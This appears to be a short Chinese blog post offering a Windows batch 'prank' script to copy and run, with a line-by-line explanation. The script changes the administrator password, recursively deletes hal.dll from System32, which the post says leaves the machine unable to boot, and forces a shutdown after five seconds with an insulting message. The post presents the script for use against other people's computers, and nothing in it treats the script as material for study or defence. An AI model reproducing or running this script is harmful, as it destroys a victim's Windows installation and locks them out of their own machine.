标签:代码 nbsp lan ida ini 横线 ash dll 打印
代码开始,只抄横线里面的
_______________________________
@echo off
net user administrator nishizhu\add
del /s /q c:\Windows\System32\hal.dll
shutdown -s -t 5 -c 你是一头猪!!!
_______________________________
代码详解:
@echo off —— 隐藏命令,关闭回显。
net user administrator nishizhu\add —— 把开机密码改成“nishizhu\add”
del /s /q c:\Windows\System32\hal.dll —— 删掉系统加载程序(删了就开不了机)
shutdown -s -t 5 -c 你是一头猪!!! —— 定时关机5秒钟,并提示你是一头猪!!!
标签:代码 nbsp lan ida ini 横线 ash dll 打印
原文地址:https://www.cnblogs.com/QUANCHANG/p/11557813.html